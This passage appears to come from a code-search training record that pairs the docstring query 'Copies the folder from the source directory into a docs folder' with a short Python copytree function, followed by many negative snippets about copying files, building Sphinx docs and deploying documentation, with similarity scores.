labels_encoded.append(le)\n data_encoded[:, i] = le.transform(data_encoded[:, i])\n\n data_encoded = data_encoded.astype(int)\n return data_encoded, labels_encoded", "def _decode_to_index(self, decoder_output):\n value, index = torch.topk(decoder_output, 1)\n index = index.transpose(0, 1) # S = 1 x B, 1 is the index of top1 class\n if self.use_cuda:\n index = index.cuda()\n return index", "def get_label_map(labels):\n label_map = dict()\n for i,v in enumerate(np.ravel(labels.data)):\n if v in label_map.keys():\n label_map.get(v).append(i)\n else:\n label_map[v] = [i]\n return label_map" ]
[ "0.70427394", "0.70352", "0.68724084", "0.6775525", "0.67488664", "0.67066264", "0.67066264", "0.66832286", "0.6675897", "0.65783316", "0.657126", "0.65644187", "0.65461975", "0.6527157", "0.65213823", "0.651859", "0.6512153", "0.65094626", "0.6494245", "0.6442707", "0.6426446", "0.64246345", "0.6420002", "0.6410096", "0.63704365", "0.6333506", "0.6323577", "0.62982804", "0.62881804", "0.62867075", "0.6257277", "0.62549657", "0.6251194", "0.6249509", "0.62385356", "0.6201743", "0.6201299", "0.6196375", "0.6193234", "0.61884993", "0.6181296", "0.61669886", "0.6163924", "0.61600244", "0.6144549", "0.611099", "0.60820746", "0.60718745", "0.60713166", "0.6066705", "0.60537386", "0.6051239", "0.60458755", "0.60439384", "0.6042537", "0.6039367", "0.6033123", "0.60295564", "0.60281044", "0.602535", "0.60216796", "0.6020794", "0.60071653", "0.60061705", "0.5998028", "0.5997444", "0.59837353", "0.59799767", "0.59799767", "0.5978724", "0.5966851", "0.59408486", "0.593383", "0.5931964", "0.5928703", "0.5926831", "0.5925557", "0.5914727", "0.5911915", "0.58881855", "0.58881855", "0.58881855", "0.58881855", "0.5887598", "0.5887309", "0.5886391", "0.5885734", "0.5873554", "0.58669937", "0.5865464", "0.5861478", "0.585411", "0.5853906", "0.58497983", "0.5843739", "0.5843588", "0.5838408", "0.58382535", "0.58275723", "0.5826133" ]
0.64324766
20
Copies the folder from the source directory into a docs folder eliminating commercial information.
def oh_folders(src, dest=dest): copytree(src, dest, ignore=ignore_patterns(*ignore_list), dirs_exist_ok=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def copy_docs():\n local('rsync -av --delete --exclude=.svn %s:%s/ /tmp/djangodocs/' %\n (env.hosts[0], env.deploy_base.child('docbuilds')))", "def copy_project_docs(srctree):\n docdir = os.path.join(srctree, 'Doc')\n\n # This block shouldn't be here, but I do not yet know how to\n # embed this in ReST files.\n extra_info = {}\n if os.path.exists(os.path.join(docdir, 'website.lst')):\n fd = open(os.path.join(docdir, 'website.lst'))\n for ln in fd.readlines():\n if ln.startswith('#'): continue\n fields = ln.split(',')\n extra_info[fields[0].strip()] = {\n 'section': fields[1].strip(),\n 'priority': int(fields[2].strip()),\n }\n\n docs = [ os.path.join(docdir, fn)\n for fn in os.listdir(docdir) if fn.endswith('.txt') ]\n docs.append(os.path.join(srctree, 'Install.txt'))\n docs.append(os.path.join(srctree, 'NEWS.txt'))\n docs.append(os.path.join(docdir, 'tutorial', 'tutorial.txt'))\n docs.append(os.path.join(docdir, 'tutorial_embed', 'extending_objc_with_python.txt'))\n NAMES = {\n os.path.join(srctree, 'Examples', '00ReadMe.txt') : 'Examples.txt',\n }\n docs.extend(NAMES)\n\n alldocs = {}\n\n for fname in docs:\n print \"-\", fname\n docinfo = {}\n\n bn = NAMES.get(fname)\n if bn is None:\n bn = os.path.split(fname)[-1]\n if bn in ('index.txt', 'announcement.txt'):\n continue\n if extra_info.has_key(bn):\n docinfo.update(extra_info[bn])\n\n if bn.endswith('.txt'):\n bn = bn[:-3].lower() + \"php\"\n else:\n bn = bn.lower() + '.php'\n fd = open(fname)\n input = fd.read()\n fd.close()\n output = docutils.core.publish_string(\n source = input,\n source_path = fname,\n destination_path = bn,\n writer_name = 'hthtml')\n \n output_lines = output.split('\\n')\n for i in range(len(output_lines)):\n if output_lines[i] == '':\n break\n idx = output_lines[i].find(':')\n if idx == -1:\n break\n\n key = output_lines[i][:idx].strip()\n value = output_lines[i][idx+1:].strip()\n docinfo[key] = value\n\n output = '\\n'.join(output_lines[i:])\n if not docinfo.has_key('title'):\n docinfo['title'] = bn\n alldocs[bn] = docinfo\n \n fd = open(os.path.join('docroot', 'doc', bn), 'w')\n fd.write(PHP_HEADER%docinfo)\n\n fd.write(output);\n\n fd.write(PHP_FOOTER)\n\n # Calculate indices for user and developer documentation\n docs = alldocs.keys()\n developer_docs = []\n user_docs = []\n\n for doc in alldocs:\n if not alldocs[doc].has_key('section'):\n print \"Skipping\", doc\n continue\n\n if alldocs[doc]['section'] == 'user':\n user_docs.append([alldocs[doc]['title'], doc])\n elif alldocs[doc]['section'] == 'developer':\n developer_docs.append([alldocs[doc]['title'], doc])\n\n def doccmp(a, b):\n r = cmp(alldocs[a[1]]['priority'], alldocs[b[1]]['priority'])\n if r != 0: return r\n\n return cmp(a[1], b[1])\n user_docs.sort(doccmp)\n developer_docs.sort(doccmp)\n \n # Rewrite the indices (substitute the current document lists)\n for fname in ('index.php', 'usage.php', 'developer.php'):\n fd = open(os.path.join('docroot', 'doc', fname), 'r')\n index_php = fd.readlines()\n fd.close()\n\n fd = open(os.path.join('docroot', 'doc', fname), 'w')\n skip = 0\n for ln in index_php:\n if not skip:\n fd.write(ln)\n if ln.find('/USERDOC') != -1:\n skip = 0\n fd.write(ln)\n elif ln.find('USERDOC') != -1:\n skip = 1\n for title, link in user_docs:\n fd.write('<LI><A HREF=\"%s\">%s</A>\\n'%(link, title))\n if ln.find('/DEVDOC') != -1:\n skip = 0\n fd.write(ln)\n elif ln.find('DEVDOC') != -1:\n skip = 1\n for title, link in developer_docs:\n fd.write('<LI><A HREF=\"%s\">%s</A>\\n'%(link, title))\n\n EXAMPLES = 
os.path.join('docroot', 'doc', 'examples.php')\n OUTEXAMPLES = os.path.join('docroot', 'examples', 'index.php')\n replace_examples_svn(EXAMPLES)\n if os.path.exists(OUTEXAMPLES):\n os.unlink(OUTEXAMPLES)\n shutil.copyfile(EXAMPLES, OUTEXAMPLES)\n\n # Copy tutorial files\n TUTORIAL_ENDINGS = ['.nib', '.py', '-src', '.h', '.m']\n tutdir = os.path.join(docdir, 'tutorial')\n files = os.listdir(tutdir)\n replacements = []\n for fn in files:\n for ext in TUTORIAL_ENDINGS:\n if fn.endswith(ext):\n dstname = os.path.join('docroot', 'doc', fn)\n replacements.append(copy_tutorial_file(fn, tutdir, dstname))\n break\n replace_tutorial_zips(os.path.join('docroot', 'doc', 'tutorial.php'), replacements)\n \n tutdir = os.path.join(docdir, 'tutorial_embed', 'src')\n files = os.listdir(tutdir)\n if not os.path.exists(os.path.join('docroot', 'doc', 'src')):\n os.mkdir(os.path.join('docroot', 'doc', 'src'))\n for fn in files:\n for ext in TUTORIAL_ENDINGS:\n if fn.endswith(ext):\n dstname = os.path.join('docroot', 'doc', 'src', fn)\n replacements.append(copy_tutorial_file(fn, tutdir, dstname))\n break\n replace_tutorial_zips(os.path.join('docroot', 'doc', 'tutorial.php'), replacements)\n\n #print \"Don't forget to update docroot/doc/tutorial.php: it's references to\"\n #print \"'step3-MainMenu.nib' and 'step12-src' should be changed to ZIP files\"", "def file_path_to_document_path(cls, source_file_path):\n pattern = PROJECT_ROOT_FOLDER.replace('\\\\', r'/') + '/'\n file_path = re.sub(pattern, '', source_file_path)\n return '{0}{1}'.format(DOCUMENT_PYTHON_FOLDER, file_path)", "def prepare_src_folder(self, src_folder: str) -> None:", "def html():\n builtdocs = path(\"docs\") / options.sphinx.builddir / \"html\"\n destdir = path(PACKAGE) / \"docs\"\n destdir.rmtree()\n builtdocs.move(destdir)", "def deploy_nucleondocs():\n\n # Copy generated docs to docs_webserver on target machine\n rsync_project(\n remote_dir= '/srv/docs_webserver/docs/nucleon/',\n local_dir=join(dirname(__file__), 'docs/_build/html/'),\n delete=True)", "def copy_files(self):\n files = ['LICENSE.md', 'CONTRIBUTING.md']\n this_dir = sh.pwd().strip()\n for _file in files:\n sh.cp(\n '{0}/templates/{1}'.format(this_dir, _file),\n '{0}/'.format(self.book.textdir)\n )", "def copydoc(self, doc):\n dst = os.path.join(self.path, os.path.split(doc)[1])\n if not self.rc.force and os.path.isfile(dst):\n raise RuntimeError(dst + \" already exists!\")\n shutil.copy2(doc, dst)\n return dst", "def copydocs(store, path, rc):\n for doc in rc.documents:\n dst = os.path.join(path, os.path.split(doc)[1])\n if not rc.force and os.path.isfile(dst):\n raise RuntimeError(dst + \" already exists!\")\n shutil.copy2(doc, dst)", "def make_source_dir():\n\n os.makedirs(files['source_dir'].rel)", "def copy_source():\n shutil.copytree(\"src\", os.path.join(BUILD_DIR, \"src\"))\n for file in os.listdir(\".\"):\n if os.path.isfile(file):\n shutil.copyfile(file, os.path.join(BUILD_DIR, file))", "def copydir(self):\n pass", "def move(self, **kwargs):\n if os.path.exists(self.old_artifact_path):\n if os.path.exists(self.target):\n shutil.rmtree(self.target)\n log.info(\"Copying %s on the local filesystem\" % self.type)\n shutil.copytree(self.old_artifact_path, self.target)\n else:\n log.warning(\"Not moving docs, because the build dir is unknown.\")", "def clean_docs(c):\n c.run(f\"rm -fr {DOCS_BUILD_DIR}\")", "def copy_files():\n os.makedirs('build/usr/lib/python3/dist-packages', exist_ok=True)\n os.makedirs('build/usr/share/doc', exist_ok=True)\n\n 
shutil.copytree('applications', 'build/usr/share/applications')\n shutil.copytree('doc', 'build/usr/share/doc/qastetray')\n shutil.copytree('icons', 'build/usr/share/icons')\n shutil.copytree('locale', 'build/usr/share/locale')\n shutil.copytree('qastetray',\n 'build/usr/lib/python3/dist-packages/qastetray')", "def copyFiles(self, package):\n styleFiles = [self.stylesDir/'..'/'base.css']\n\tstyleFiles += [self.stylesDir/'..'/'popup_bg.gif']\n styleFiles += self.stylesDir.files(\"*.css\")\n if \"nav.css\" in styleFiles:\n styleFiles.remove(\"nav.css\")\n styleFiles += self.stylesDir.files(\"*.jpg\")\n styleFiles += self.stylesDir.files(\"*.gif\")\n styleFiles += self.stylesDir.files(\"*.png\")\n styleFiles += self.stylesDir.files(\"*.js\")\n styleFiles += self.stylesDir.files(\"*.html\")\n self.stylesDir.copylist(styleFiles, self.outputDir)\n package.resourceDir.copyfiles(self.outputDir)\n self.scriptsDir.copylist(('libot_drag.js', 'common.js'), \n self.outputDir)\n self.templatesDir.copylist(('videoContainer.swf', 'magnifier.swf',\n 'xspf_player.swf'),self.outputDir)\n (self.templatesDir/'fdl.html').copyfile(self.outputDir/'fdl.html')", "def upload():\n env.user = 'webcontent'\n rsync_project(DOCDIR, 'doc/_build/html/', delete=True)", "def generate_docs(root_dir, session):\n ...", "def update_spx_source(src=\"\"):\n\n # delete old spx_prj source\n p_spxsrc = p(spx_src_dir)\n if p_spxsrc.is_dir():\n shutil.rmtree(p_spxsrc)\n p_spxsrc.mkdir()\n\n # prepare new spx_prj source dir\n p_spxsrc_org = p(str(p_spxsrc) + \"_org\")\n list_src = p_spxsrc_org.glob(\"**/*\")\n _listprint(list_src)\n du.copy_tree(str(p_spxsrc_org), str(p_spxsrc))\n\n # copy doc source\n list_src = src.glob(\"**/*\")\n _listprint(list_src)\n\n du.copy_tree(str(src), str(p_spxsrc))", "def build_docs(session):\n envbindir = session.bin\n session.install(\"-e\", \".[all,docs]\")\n with session.chdir(\"docs/\"):\n session.run(\n \"sphinx-autobuild\",\n \"-j\",\n \"auto\",\n \"--open-browser\",\n \"-qT\",\n \".\",\n f\"{envbindir}/../tmp/html\",\n )", "def doc(self):\n from distutils.dir_util import copy_tree\n\n def copy_tree_checker(src, dst):\n \"\"\"Wrap copy_tree to avoid pydoit error.\"\"\"\n copy_tree(src, dst)\n return True\n\n return {\n \"actions\": [\n (create_dir, [\"build/doc/source\"]),\n (copy_tree_checker, [\"docs\", \"build/doc/source\"]),\n TaskCreator.get_sphinx() + \"-apidoc -o build/doc/source --force --separate --module-first \" + self.project_name_sc,\n TaskCreator.get_sphinx() + \"-build -j auto -n build/doc/source build/doc/html\"\n ],\n \"verbosity\": 2\n }", "def deploy_sphinx_docs():\n require('docs_root', 'docs_install_dir')\n sphinx.build_html_docs(env.docs_root)\n sudo('mkdir -p {}'.format(env.docs_install_dir))\n sphinx.deploy_html_docs(env.docs_root,\n env.docs_install_dir)", "def test_docdir(self):\n self.chck_triple('docdir')", "def nixos():\n MSG = \"Agda-pkg will copy the following files to the current directory.\"\n click.echo(MSG)\n for file in SUPPORT_FILES_PATH.iterdir():\n print(file.as_posix())\n if click.confirm('Do you want to proceed?'):\n pwd = Path().cwd()\n copy_tree(SUPPORT_FILES_PATH.as_posix(), pwd.as_posix(), update=1, verbose=1)", "def _enableCustomSourcesFolder():\n configroot = join(expanduser(\"~\"), \".wesen\")\n sourcefolder = join(configroot, \"sources\")\n if(not exists(configroot)):\n mkdir(configroot)\n if(not exists(sourcefolder)):\n mkdir(sourcefolder)\n sys.path.append(sourcefolder)", "def update_docs():\n site_path = os.path.join(PROJECTS_ROOT, CURRENT_SITE)\n 
docs_path = os.path.join(site_path, 'doc_src')\n with cd(docs_path):\n run('git reset --hard && git pull --all')\n run('workon djangopatterns && cd doc_src && make clean')\n run('workon djangopatterns && cd doc_src && make json')", "def create_source(self, source):\n if not os.path.isdir(source):\n os.makedirs(source)\n # Create a text file in the source directory.\n text_file = os.path.join(source, 'notes.txt')\n with open(text_file, 'w') as handle:\n handle.write(\"This file should be included in the backup.\\n\")\n # Create a subdirectory in the source directory.\n subdirectory = os.path.join(source, 'subdirectory')\n os.mkdir(subdirectory)\n # Create a symbolic link in the subdirectory.\n symlink = os.path.join(subdirectory, 'symbolic-link')\n os.symlink('../include-me.txt', symlink)", "def generate():\n local('cd doc && make clean && make html')", "def docs_root():\n start, result = get_docs_root()\n if result is None:\n pytest.skip(f\"No directory '{DOCS_DIR}' found from '{start}'\")\n yield result", "def conditional_copy(asciitest_out_dir, doc_file):\n # path join uses backslash win32 which is not cmake compatible\n\n filename = save_cmake_filename(doc_file)\n\n filename1 = os.path.join(asciitest_out_dir, filename + \".temp\").replace(\"\\\\\",\"/\")\n filename2 = os.path.join(asciitest_out_dir, filename).replace(\"\\\\\",\"/\")\n\n update_if_different(filename1, filename2)", "def pandoc_s2s(app, docname, source):\n\n enabled_extensions = app.config.pandoc_s2s_formats\n\n noextpath = os.path.join(app.srcdir, docname)\n if not os.path.exists(noextpath + \".rst\"):\n for ext in enabled_extensions:\n if os.path.exists(noextpath + ext):\n source[0] = pypandoc.convert_file(noextpath + ext, \"rst\")\n break", "def copy_source_files(or_dir,template_dir): \n def copy_sc(file,fpA,fpB):\n fpA = os.path.join(fpA,file)\n if os.path.isfile(fpA):\n shutil.copy(fpA,fpB)\n else:\n raise Exception(\"Error: File '{}' is missing\".format(file))\n return\n \n copy_sc('imta_core.sty',or_dir,template_dir)\n copy_sc('imta_extra.sty',or_dir,template_dir)\n copy_sc('imta_logo.pdf',or_dir,template_dir)\n copy_sc('imta_documentation.tex',or_dir,template_dir)\n print('Template files copied at {}'.format(template_dir))", "def full_doc_path(self, version='latest'):\n doc_base = self.checkout_path(version)\n for possible_path in ['docs', 'doc', 'Doc']:\n if os.path.exists(os.path.join(doc_base, '%s' % possible_path)):\n return os.path.join(doc_base, '%s' % possible_path)\n #No docs directory, docs are at top-level.\n return doc_base", "def vendor_robocorp_ls_core(self):\n import shutil\n\n src_core = os.path.join(\n os.path.dirname(__file__),\n \"..\",\n \"robocorp-python-ls-core\",\n \"src\",\n \"robocorp_ls_core\",\n )\n vendored_dir = self.remove_vendor_robocorp_ls_core()\n print(\"Copying from: %s to %s\" % (src_core, vendored_dir))\n\n shutil.copytree(src_core, vendored_dir)\n print(\"Finished vendoring.\")", "def copy_drafts():\r\n draft_dir = path(source_dir) / course_name / DRAFT_DIR\r\n if draft_dir.isdir():\r\n shutil.copytree(draft_dir, copy_root / DRAFT_DIR)", "def build_docs(open_docs):\n python_call(\"pip\", [\"install\", \"src/[docs]\"])\n python_call(\"pip\", [\"install\", \"-r\", \"src/requirements.txt\"])\n python_call(\n \"ipykernel\", [\"install\", \"--user\", \"--name=za_covid_map\"]\n )\n shutil.rmtree(\"docs/build\", ignore_errors=True)\n call(\n [\n \"sphinx-apidoc\",\n \"--module-first\",\n \"-o\",\n \"docs/source\",\n \"src/za_covid_map\",\n ]\n )\n call([\"sphinx-build\", \"-M\", 
\"html\", \"docs/source\", \"docs/build\", \"-a\"])\n if open_docs:\n docs_page = (Path.cwd() / \"docs\" / \"build\" / \"html\" / \"index.html\").as_uri()\n secho(\"Opening {}\".format(docs_page))\n webbrowser.open(docs_page)", "def createBaseFolder(self):\n if not os.path.isdir(self.gdocs_folder):\n os.mkdir(self.gdocs_folder, 0755)", "def create_license(self) -> None:\n # copy the license file from the template to the package folder\n # option : append other license files\n shutil.copy(CONFIG.template_path / \"LICENSE.md\", self.package_path)", "def documents():\n for domain in os.listdir(DOCUMENT_FOLDER):\n for docname in os.listdir(os.path.join(DOCUMENT_FOLDER, domain)):\n filename = os.path.join(DOCUMENT_FOLDER, domain, docname)\n if filename.endswith(\".html\"):\n fullDocname = os.path.join(domain, docname)\n yield (fullDocname, filename)", "def build_docs(source, destination, doctrees):\n sphinx_argv = [\n '-b', 'html',\n '-d', doctrees,\n source,\n destination]\n\n sphinx_main(['sphinx-build'] + sphinx_argv)", "def docs():\n sh('sphinx-build -W -b html docs docs/_build/html')", "def do_build():\n tmp_dir = Path(tempfile.mkdtemp())\n (tmp_dir / \"integrations-docs.js\").write_text(render_js_module(collect_docs(), *collect_metrics(), collect_meta()))\n\n symlink_images(tmp_dir)\n\n shutil.rmtree(OUT_DIR, ignore_errors=True)\n tmp_dir.replace(OUT_DIR)", "def pre_install(self, dest_dir):\n pass", "def _copy_sources():\n shutil.rmtree(SRC_DIR_LOCAL, ignore_errors=True)\n os.mkdir(SRC_DIR_LOCAL)\n\n shutil.copy(os.path.join(SRC_DIR_REPO, 'LICENSE.txt'), SRC_DIR_LOCAL)\n shutil.copy(os.path.join(SRC_DIR_REPO, 'z3.pc.cmake.in'), SRC_DIR_LOCAL)\n shutil.copy(os.path.join(SRC_DIR_REPO, 'CMakeLists.txt'), SRC_DIR_LOCAL)\n shutil.copytree(os.path.join(SRC_DIR_REPO, 'cmake'), os.path.join(SRC_DIR_LOCAL, 'cmake'))\n shutil.copytree(os.path.join(SRC_DIR_REPO, 'scripts'), os.path.join(SRC_DIR_LOCAL, 'scripts'))\n\n # Copy in src, but avoid recursion\n def ignore_python_setup_files(src, _):\n if os.path.normpath(src).endswith('api/python'):\n return ['core', 'dist', 'MANIFEST', 'MANIFEST.in', 'setup.py', 'z3_solver.egg-info']\n return []\n shutil.copytree(os.path.join(SRC_DIR_REPO, 'src'), os.path.join(SRC_DIR_LOCAL, 'src'),\n ignore=ignore_python_setup_files)", "def copy_static(self, outdir):\n pass", "def add_files(cls, document, source_files):\n with zipfile.ZipFile(document, 'a') as open_document:\n for src_file in source_files:\n open_document.write(src_file, Manifest.file_path_to_document_path(src_file))", "def make_document(source_path=\"notset\") -> nodes.document:\n settings = OptionParser(components=(RSTParser,)).get_default_values()\n return new_document(source_path, settings=settings)", "def set_source_path(self, folder):\n self.source_path = folder", "def copy(self, target):\r\n py.process.cmdexec(\"svn copy %s %s\" %(str(self), str(target)))", "def generate_documentation(self):\n self.generate_api_docs()\n build.main([\n self.SOURCE_DIR,\n self.BUILD_DIR,\n ])", "def pushDocsFromDir(docDir):\n\tfor i in os.listdir(docDir):\n\t\tif not(i.endswith(\".DS_Store\")):\n\t\t\tif not(docDir.endswith(\"/\")):\n\t\t\t\tfilename = (docDir+\"/\"+i)\n\t\t\telse:\n\t\t\t\tfilename = docDir + i\n\t\t\tpushDocumentToPhone(filename)\n\n\tprint \"Finished pushing files.\"", "def doc2path(self, docname, base=True, suffix=None):\n if docname.startswith(\":cfg:\"):\n docname = os.path.join(self.srcdir, \"..\", docname[5:])\n\n if suffix:\n return old_doc2path(self, docname, base, suffix)\n\n for suffix in 
(\".yay\", \".rst\"):\n path = old_doc2path(self, docname, base, suffix)\n if os.path.exists(path):\n break\n\n return path", "def bootstrap_development_distribution(project_name: str, dest_dir: Path):\n src_dir = Path(__file__).parent.parent.absolute()\n print(f\"Bootstrap: {src_dir} -> {dest_dir}\")\n shutil.copytree(\n src_dir,\n dest_dir,\n ignore=shutil.ignore_patterns(\n project_name.lower(),\n \".git\",\n \"build\",\n \"dist\",\n \"docs\",\n \".pytest_cache\",\n \".eggs\",\n \"templates\",\n \"__pycache__\",\n ),\n )", "def build_docs(options):\r\n verbose = getattr(options, 'verbose', False)\r\n\r\n cmd = \"cd {dir}; make html quiet={quiet}\".format(\r\n dir=doc_path(options),\r\n quiet=\"false\" if verbose else \"true\"\r\n )\r\n\r\n sh(cmd)", "def offline_copy(_export_path):\n global export_path\n export_path = _export_path\n \n # First, monkey patch the original config\n main.NBCONFIG.protectect_dirs = []\n main.NBCONFIG.protected_users = {}\n main.NBCONFIG.edit_users = {}\n \n # Now monkey patch NBweb\n main.REQUIRELOGIN = False\n\n pages = []\n\n # Copy and work all source files \n for dirpath,dirnames,filenames in os.walk(NBCONFIG.source):\n for dirname in dirnames[:]: # Iterate a copy since we will delete in place\n if any(dirname.startswith(i) for i in ['.']):\n dirnames.remove(dirname) # So we do not parse it later\n continue\n if dirname == '_scratch':\n dirnames.remove(dirname) # So we do not parse it later\n continue\n \n # Names\n src_systemname = os.path.join(dirpath,dirname)\n rootname = os.path.relpath(src_systemname,NBCONFIG.source) # No leading / though\n dest_systemname = os.path.join(export_path,rootname)\n \n mkdir(rootname,isfile=False) # Will make the dir no matter what\n \n # Index\n dest = os.path.join(export_path,rootname, 'index.html')\n \n # Exclusions.\n if main.exclusion_check(utils.join('/',rootname +'/')):\n with open(dest,'w',encoding='utf8') as FF:\n FF.write('')\n continue\n \n try:\n html = main.main_route('/' + rootname + '/')\n except HTTPError:\n # Likely some additional resource in _NBweb\n try:\n os.rmdir(dest_systemname) # Should be empty\n except OSError:\n pass\n os.symlink(src_systemname,dest_systemname)\n continue\n \n \n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n # _all\n dest = os.path.join(export_path,'_all',rootname, 'index.html')\n mkdir(dest,isfile=True,isfull=True)\n \n html = main.allpage('/'+ rootname +'/')\n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n \n # Loop each file\n for filename in filenames:\n if os.path.splitext(filename)[0] == 'index':\n continue # Already made above\n \n # Names\n src_systemname = os.path.join(dirpath,filename)\n rootname = os.path.relpath(src_systemname,NBCONFIG.source) # No leading / though\n dest_systemname = os.path.join(export_path,rootname)\n \n mkdir(rootname,isfile=True) # Will make the dir no matter what\n try:\n os.symlink(src_systemname,dest_systemname) \n except OSError:\n os.remove(dest_systemname)\n os.symlink(src_systemname,dest_systemname)\n \n rootbasename,ext = os.path.splitext(rootname)\n if ext in NBCONFIG.extensions:\n dest = os.path.join(export_path,rootbasename + '.html')\n try:\n html = main.main_route(rootbasename + '.html')\n except:\n print('Issue with: {}'.format(rootname))\n \n html = process_page(html,dest)\n \n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n pages.append(rootbasename)\n\n ## Index pages\n # Home page w/o blog\n dest_systemname = 
os.path.join(export_path,'')\n dest = os.path.join(export_path,'index.html')\n \n html0 = main.main_route('/',map_view=True)\n \n html = process_page(html0,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n\n # Also write the sitemap\n dest = os.path.join(export_path,'_sitemap/index.html')\n mkdir('/_sitemap',isfile=False)\n html = process_page(html0,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n # _all\n dest = os.path.join(export_path,'_all','index.html')\n \n html = main.allpage('/')\n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n ## Blog Pages\n if len(NBCONFIG.blog_dirs) > 0:\n blog_num = 0\n while True:\n dest = os.path.join(export_path,'_blog',unicode(blog_num),'index.html')\n \n try:\n html = main.main_route('/',map_view=False,blog_num=blog_num)\n except HTTPError:\n break # At the last one\n \n mkdir(dest,isfile=True,isfull=True) \n \n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n blog_num += 1\n # Make the home page. \n dest = os.path.join(export_path,'index.html')\n html = main.main_route('/',map_view=False,blog_num=0)\n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n ## Special Pages\n make_random_forward(pages)\n \n # Tags\n dest = os.path.join(export_path,'_tags/index.html')\n mkdir(dest,isfile=True,isfull=True) \n html = main.return_tags()\n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n # ToDos\n dest = os.path.join(export_path,'_todo/index.html')\n mkdir(dest,isfile=True,isfull=True) \n html = main.return_todo()\n html = process_page(html,dest)\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(html)\n \n txt = main.return_todo_txt()\n dest = os.path.join(export_path,'_todo/todo.txt')\n with open(dest,'w',encoding='utf8') as FF:\n FF.write(txt)\n \n # Galleries\n cpsym( utils.join(NBCONFIG.scratch_path,'_galleries'),utils.join(export_path,'_galleries'))\n \n ## Clean up\n for F in [utils.join(export_path,'_NBweb',a) for a in ['NBCONFIG.py','NBCONFIG.pyc','template.html']]:\n try:\n os.remove(F)\n except:\n pass\n \n # Make sure there are never any directory listings\n for dirpath,dirnames,filenames in os.walk(export_path):\n if 'index.html' not in filenames:\n with open(utils.join(dirpath,'index.html'),'w',encoding='utf8') as F:\n F.write('')", "def build_folders(source, destination_temp, standard, root):\n\n source_fs = OSFS(source)\n\n print \"Processing %s ... 
\" % standard['id']\n standard_fs = source_fs.opendir(standard['id'])\n\n # list all artifacts of a standard\n artifacts = standard_fs.listdir(dirs_only=True)\n if '.git' in artifacts: artifacts.remove(\".git\")\n\n for artifact in artifacts:\n # check whether artifact folder exists in destination_temp \n if root.exists('%s/%s' % (destination_temp, artifact)) == False:\n root.makedir('%s/%s' % (destination_temp, artifact))\n\n # copy standard folders from source to destination_temp in desired structure\n root.copydir('%s/%s/%s' % (source, standard['id'], artifact), '%s/%s/%s' % (destination_temp, artifact, standard['id']))\n\n html = create_standard_webpage(standard, artifacts)\n\n # check whether register/standard exists\n if root.exists('%s/%s' % (destination_temp, standard['id'])) == False:\n root.makedir('%s/%s' % (destination_temp, standard['id']))\n \n # write standard HTML page to register/standard/index.html\n with codecs.open('%s/%s/index.html' % (destination_temp, standard['id']), 'w', encoding='utf8') as f:\n f.write(html)\n\n # copy web assets\n root.copydir('web/assets', '%s/r' % destination_temp, overwrite=True)", "def set_domain_path(self):\n\n self.domain_path = os.path.join(self.docs_path, self.domain)\n if not os.path.exists(self.domain_path):\n os.makedirs(self.domain_path)", "def generate_api_docs(self):\n if self.API_OUTPUT_DIR:\n args = [\n # Put documentation for each module on its own page\n '-e',\n # don't create the \"modules.rst\" file (the table of contents\n # file) as this is already provided by the package's main rst\n # file.\n '-T',\n # Overwrite existing files\n '--force',\n '-o', self.API_OUTPUT_DIR,\n # the package to generate docs from\n self.PROJECT_DIR\n ]\n excludes = [\n os.path.join(self.PROJECT_DIR, p)\n if not os.path.isabs(p) else p\n for p in self.API_EXCLUDE_DIRS\n ]\n apidoc.main(args + excludes)", "def copy_reports(ctx):\n log = Path('./log.html')\n report = Path('./report.html')\n dest = Path('.') / 'reports'\n print(log.absolute())\n shutil.copy(log.absolute(), str(dest))\n print(report.absolute())\n shutil.copy(report.absolute(), str(dest))", "def copy_helper(project_name, directory):\n # Read the templates for projects\n template_dir = os.path.join(qisrc.QISRC_ROOT_DIR, \"templates\", \"project\")\n template_dir = os.path.abspath(template_dir)\n\n for file_name in os.listdir(template_dir):\n with open(os.path.join(template_dir, file_name), \"r\") as old_file:\n old_contents = old_file.read()\n new_contents = old_contents.replace(\"@project_name@\", project_name)\n with open(os.path.join(directory, file_name), \"w\") as new_file:\n new_file.write(new_contents)", "def copy_to_ocr(doc_dict):\n try:\n\n # check if document directory in OCR input directory exists\n if not os.path.exists(os.path.join(config.TOC_OCR_IN, doc_dict['name'])):\n # create missing directories\n os.makedirs(os.path.join(config.TOC_OCR_IN, doc_dict['name']))\n except:\n raise IOError(f\"{format(datetime.now(), '%Y-%m-%d %H:%M:%S')} ERROR (OCR): Failed to create directory {os.path.join(config.TOC_OCR_IN,doc_dict['name'])} in {config.TOC_OCR_IN}...\")\n\n for item in doc_dict['toc']:\n\n # check if file referenced in dictionary is really in the document root directory\n if not os.path.isfile(item):\n\n # raise an exception if the isn't\n raise IOError(f\"{format(datetime.now(), '%Y-%m-%d %H:%M:%S')} ERROR (OCR): File {item} is not in the document directory {doc_dict['path']}...\")\n\n try:\n # copy file to document directory in OCR input directory\n 
